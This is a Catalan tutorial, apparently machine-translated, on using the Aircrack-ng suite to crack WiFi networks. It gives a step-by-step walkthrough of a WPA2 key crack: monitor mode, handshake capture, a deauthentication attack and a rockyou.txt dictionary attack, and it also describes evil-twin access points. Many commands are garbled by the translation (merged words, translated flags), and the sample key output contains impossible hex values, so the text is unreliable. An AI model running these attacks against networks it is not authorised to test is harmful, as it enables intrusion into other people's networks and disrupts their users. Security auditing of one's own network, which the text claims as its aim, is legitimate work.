Com utilitzar Aircrack-ng

How Use Aircrack Ng



La majoria de les vegades, la gent mai no pensa en la xarxa a la qual està connectada. Mai no pensen la seguretat que té aquesta xarxa i quant arrisquen les seves dades confidencials diàriament. Podeu fer controls de vulnerabilitat a les vostres xarxes wifi mitjançant una eina molt potent anomenada Aircrack-ng i Wireshark. Wireshark s’utilitza per controlar l’activitat de la xarxa. Aircrack-ng s’assembla més a una eina agressiva que us permet piratejar i donar accés a connexions sense fils. Pensar com a intrús sempre ha estat la manera més segura de protegir-se contra un hack. És possible que pugueu copsar les accions exactes que farà un intrús per obtenir accés al vostre sistema aprenent sobre el trencament d’aire. A continuació, podeu fer controls de conformitat al vostre propi sistema per assegurar-vos que no sigui insegur.

Aircrack-ng és un conjunt complet de programari dissenyat per provar la seguretat de la xarxa WiFi. No és només una eina única, sinó una col·lecció d'eines, cadascuna de les quals realitza un propòsit particular. Es poden treballar diferents àrees de seguretat wifi, com ara controlar el punt d’accés, provar, atacar la xarxa, trencar la xarxa wifi i provar-la. L’objectiu clau d’Aircrack és interceptar els paquets i desxifrar els hash per trencar les contrasenyes. Admet gairebé totes les noves interfícies sense fils. Aircrack-ng és una versió millorada d 'un paquet d' eines antiquat Aircrack, ng fa referència a Nova generació . Algunes de les eines fantàstiques que funcionen juntes per dur a terme una tasca més gran.







Airmon:

Airmon-ng s’inclou al kit aircrack-ng que col·loca la targeta d’interfície de xarxa en mode monitor. Normalment, les targetes de xarxa només accepten paquets orientats a ells tal com es defineix a l’adreça MAC de la NIC, però amb airmon-ng també s’acceptaran tots els paquets sense fils, tant si són orientats com si no. Hauríeu de poder agafar aquests paquets sense enllaçar-los ni autenticar-vos amb el punt d’accés. S'utilitza per comprovar l'estat d'un punt d'accés posant la interfície de xarxa en mode monitor. En primer lloc, haureu de configurar les targetes sense fils per activar el mode monitor i, a continuació, eliminar tots els processos en segon pla si creieu que algun procés hi interfereix. Després de finalitzar els processos, es pot habilitar el mode de monitorització a la interfície sense fils executant l'ordre següent:



[correu electrònic protegit]: ~ $suoairmon-ng start wlan0#

També podeu desactivar el mode de monitor aturant airmon-ng en qualsevol moment mitjançant l'ordre següent:

[correu electrònic protegit]: ~ $suoairmon-ng stop wlan0#

Airodump:

Airodump-ng s’utilitza per llistar totes les xarxes que ens envolten i per veure informació valuosa sobre elles. La funcionalitat bàsica de airodump-ng és ensumar paquets, de manera que està programat bàsicament per agafar tots els paquets que ens envolten mentre es posen en mode monitor. L’executarem contra totes les connexions que ens envolten i recopilarem dades com el nombre de clients connectats a la xarxa, les seves adreces Mac corresponents, l’estil de xifratge i els noms dels canals i després començarem a orientar la nostra xarxa objectiu.

En escriure l’ordre airodump-ng i donar-li el nom de la interfície de xarxa com a paràmetre, podem activar aquesta eina. Enumerarà tots els punts d’accés, la quantitat de paquets de dades, els mètodes d’encriptació i autenticació utilitzats i el nom de la xarxa (ESSID). Des del punt de vista de pirateria, les adreces Mac són els camps més importants.

[correu electrònic protegit]: ~ $suoairodump-ng wlx0mon

Aircrack:

Aircrack s’utilitza per trencar contrasenyes. Després de capturar tots els paquets amb airodump, podem trencar la clau per aircrack. Esborra aquestes claus mitjançant dos mètodes PTW i FMS. L'enfocament PTW es fa en dues fases. Al principi, només s’utilitzen els paquets ARP i només després, si la clau no s’esquerda després de la cerca, utilitza tots els altres paquets capturats. Un punt positiu de l'enfocament PTW és que no tots els paquets s'utilitzen per al cracking. En el segon enfocament, és a dir, FMS, fem servir tant els models estadístics com els algues de força bruta per trencar la clau. També es pot utilitzar un mètode de diccionari.

Aireplay:

Airplay-ng introdueix paquets a una xarxa sense fils per crear o accelerar el trànsit. Aireplay-ng pot capturar paquets de dues fonts diferents. El primer és la xarxa en directe i el segon són els paquets del fitxer pcap ja existent. Airplay-ng és útil durant un atac de desautenticació dirigit a un punt d'accés sense fils i a un usuari. A més, podeu realitzar alguns atacs com l’atac amb cafè amb cafè amb llet amb airplay-ng, una eina que us permet obtenir una clau del sistema del client. Podeu aconseguir-ho agafant un paquet ARP i després manipulant-lo i enviant-lo de nou al sistema. A continuació, el client crearà un paquet que pot ser capturat per airodump i el crack aeri esquerda la clau del paquet modificat. Algunes altres opcions d'atac de airplay-ng inclouen chopchop, fragment arepreplay, etc.

Base aèria:

Airbase-ng s’utilitza per transformar l’ordinador d’un intrús en un punt de connexió compromès perquè altres s’hi puguin enllaçar. Utilitzant Airbase-ng, podeu afirmar ser un punt d’accés legal i realitzar atacs man-in-the-middle a ordinadors connectats a la vostra xarxa. Aquest tipus d’atacs s’anomenen Evil Twin Attacks. És impossible per als usuaris bàsics discernir entre un punt d’accés legal i un punt d’accés fals. Per tant, l’amenaça de bessons malignes és una de les amenaces sense fils més amenaçadores que enfrontem avui.

Airolib-ng:

Airolib accelera el procés de pirateria mitjançant l’emmagatzematge i la gestió de les llistes de contrasenyes i el punt d’accés. El sistema de gestió de bases de dades utilitzat per aquest programa és SQLite3, que està disponible principalment a totes les plataformes. El trencament de contrasenya inclou el càlcul de la clau mestra parella mitjançant la qual s’extreu la clau transitòria privada (PTK). Mitjançant el PTK, podeu determinar el codi d’identificació del missatge de trama (MIC) per a un paquet determinat i, teòricament, trobar que el MIC sigui similar al paquet, de manera que si el PTK tenia raó, el PMK també tenia raó.

Per veure les llistes de contrasenyes i les xarxes d'accés emmagatzemades a la base de dades, escriviu l'ordre següent:

[correu electrònic protegit]: ~ $suoairolib-ng testdatabase: estadístiques

Aquí la base de dades de prova és la base de dades a la qual voleu accedir o crear-la i –stats és l'operació que voleu realitzar-hi. Podeu fer diverses operacions als camps de la base de dades, com ara donar la màxima prioritat a algun SSID o alguna cosa així. Per utilitzar airolib-ng amb aircrack-ng, introduïu l'ordre següent:

[correu electrònic protegit]: ~ $suoaircrack-ng-rtestdatabase wpa2.eapol.cap

Aquí fem servir els PMK ja calculats emmagatzemats a base de dades de proves per accelerar el procés de cracking de contrasenyes.

Cracking WPA / WPA2 amb Aircrack-ng:

Vegem un petit exemple del que pot fer aircrack-ng amb l'ajut d'algunes de les seves impressionants eines. Trencarem la clau precompartida d’una xarxa WPA / WPA2 mitjançant un mètode de diccionari.

El primer que hem de fer és enumerar les interfícies de xarxa que admeten el mode de monitorització. Això es pot fer mitjançant l'ordre següent:

[correu electrònic protegit]: ~ $suoairmon-ng

Xipset de controladors d’interfície PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Podem veure una interfície; ara, hem de posar la interfície de xarxa que hem trobat (wlx0) en mode monitor mitjançant l'ordre següent:

[correu electrònic protegit]: ~ $suoairmon-ng start wlx0

Ha activat el mode de monitor a la interfície anomenada wlx0mon .

Ara hauríem de començar a escoltar les emissions de routers propers a través de la nostra interfície de xarxa que hem posat en mode monitor.

[correu electrònic protegit]: ~ $suoairodump-ng wlx0mon

CH5 ][Transcorregut:30s][ 2020-12-02 00:17



Balises BSSID PWR#Dades, # / s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -45 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10: SER-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74:DÓNA:88: FA:38: 02-68 28 2 0 1154e WPA2 CCMP PSK TP-Link_3802



Sonda BSSID STATION PWR Rate Frames



E4: 6F:13: 04: CE:315C: 3A:45: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -390e-1 1002 13

La nostra xarxa objectiu és Crackit en aquest cas, que s’executa actualment al canal 1.

Aquí, per tal d’esquivar la contrasenya de la xarxa de destinació, hem de capturar un encaix de mans de quatre vies, que passa quan un dispositiu intenta connectar-se a una xarxa. Podem capturar-lo mitjançant l'ordre següent:

[correu electrònic protegit]: ~ $suoairodump-ng-c 1--bssid E4: 6F:13: 04: CE:31 -en /casa wlx0

-c : Canal

–Bss : Bssid de la xarxa de destinació

-en : El nom del directori on es col·locarà el fitxer pcap

Ara hem d’esperar que un dispositiu es connecti a la xarxa, però hi ha una manera millor de capturar un apretó de mans. Podem desautenticar els dispositius a l’AP mitjançant un atac de desautenticació mitjançant l’ordre següent:

[correu electrònic protegit]: ~ $suoaireplay-ng-0 -aE4: 6F:13: 04: CE:31

a : Bssid de la xarxa de destinació

-0 : atac de desautenticació

Hem desconnectat tots els dispositius i ara hem d’esperar a que un dispositiu es connecti a la xarxa.

CH1 ][Transcorregut:30s][ 2020-12-02 00:02][Encaix de mans WPA: E4: 6F:13: 04: CE:31



Balises BSSID PWR RXQ#Dades, # / s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154è WPA2 CCMP PSK P



Sonda BSSID STATION PWR Rate Frames



E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:45: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Tenim un èxit i, mirant l’angle superior dret just al costat de l’hora, podem veure que s’ha capturat una encaixada de mans. Ara busqueu a la carpeta especificada ( / casa en el nostre cas) per a .pcap dossier.

Per trencar la clau WPA, podem utilitzar l'ordre següent:

[correu electrònic protegit]: ~ $suoaircrack-ng-a2 -enrockyou.txt-bE4: 6F:13: 04: CE:31encaixada de mans

b: Bssid de la xarxa de destinació

-a2: mode WPA2

Rockyou.txt: el diccionaridossierusat

Encaixada de mans: capdossier quinconté una encaixada de mà capturada

Aircrack-ng1.2beta3

[00:01:49] 10566claus provades(1017.96a/s)

CLAU TROBADA! [m'oblides]

Clau mestra: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6F50C


Clau transitòria: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6F50C025 62E9 5D71

La clau de la nostra xarxa objectiu s’ha trencat amb èxit.

Conclusió:

Les xarxes sense fils són a tot arreu, utilitzades per totes i cadascuna de les empreses, des de treballadors que fan servir telèfons intel·ligents fins a dispositius de control industrial. Segons la investigació, gairebé més del 50 per cent del trànsit d'Internet passarà per WiFi el 2021. Les xarxes sense fils tenen molts avantatges, la comunicació exterior, l'accés ràpid a Internet en llocs on és gairebé impossible posar cables, pot expandir la xarxa sense instal·lar cables. per a qualsevol altre usuari i pot connectar fàcilment els vostres dispositius mòbils a les vostres oficines domèstiques mentre no hi esteu.

Malgrat aquests avantatges, hi ha un gran interrogant sobre la vostra privadesa i seguretat. Com aquestes xarxes; dins del rang de transmissió dels routers estan oberts a tothom, es poden atacar fàcilment i es poden comprometre fàcilment les vostres dades. Per exemple, si esteu connectat a una xarxa wifi pública, qualsevol persona connectada a aquesta xarxa pot comprovar fàcilment el trànsit de la vostra xarxa amb una mica d’intel·ligència i amb l’ajut d’eines fantàstiques disponibles i, fins i tot, desfer-la.